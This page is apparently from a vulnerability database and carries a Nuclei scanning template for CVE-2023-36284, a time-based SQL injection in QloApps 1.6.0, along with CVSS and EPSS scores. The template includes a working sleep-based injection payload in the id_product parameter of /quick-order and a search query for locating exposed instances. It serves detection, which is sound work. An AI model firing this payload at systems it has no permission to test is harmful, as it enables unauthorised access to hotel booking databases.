Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-36284
HistoryMay 23, 2024 - 4:09 a.m.

QloApps 1.6.0 - SQL Injection

2024-05-2304:09:31
ProjectDiscovery
github.com
6
sqlinjection
webkul
unauthorizedaccess
patch
cve2023
qloapps

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.007 Low

EPSS

Percentile

80.7%

An unauthenticated Time-Based SQL injection found in Webkul QloApps 1.6.0 via GET parameters date_from, date_to, and id_product allows a remote attacker to retrieve the contents of an entire database.
id: CVE-2023-36284

info:
  name: QloApps 1.6.0 - SQL Injection
  author: ritikchaddha
  severity: high
  description: |
    An unauthenticated Time-Based SQL injection found in Webkul QloApps 1.6.0 via GET parameters date_from, date_to, and id_product allows a remote attacker to retrieve the contents of an entire database.
  impact: |
    Successful exploitation could lead to unauthorized access to sensitive data.
  remediation: |
    Apply the vendor-supplied patch or upgrade to a non-vulnerable version.
  reference:
    - https://flashy-lemonade-192.notion.site/Time-Based-SQL-injection-in-QloApps-1-6-0-be3ed1bdaf784a77b45dc6898a2de17e
    - https://nvd.nist.gov/vuln/detail/CVE-2023-36284
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-36284
    cwe-id: CWE-89
    epss-score: 0.00721
    epss-percentile: 0.80577
    cpe: cpe:2.3:a:webkul:qloapps:1.6.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: webkul
    product: qloapps
    fofa-query:
      - "title=\"QloApps\""
      - title="qloapps"
  tags: cve,cve2023,qloapps,sqli,webkul
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/2
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        internal: true
        words:
          - "QloApps"
        case-insensitive: true

  - raw:
      - |
        @timeout: 20s
        GET /quick-order?date_from=2023-06-12%2000:00:00&date_to=2023-06-13%2000:00:00&deleteFromOrderLine=1&id_product=(select(0)from(select(sleep(5)))v) HTTP/2
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - duration>=5
          - 'contains(body, "<span>Guest Information")'
        condition: and
# digest: 4b0a00483046022100be761ba1c4d35d37f2477043c838509e758b5823b11e9519c50e36a8e9ca07bf022100b0e938bfb91cfacfd6a64d4c5a6004b91a17cb3b28e226db6648e2fe19a9433d:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.007 Low

EPSS

Percentile

80.7%

Related for NUCLEI:CVE-2023-36284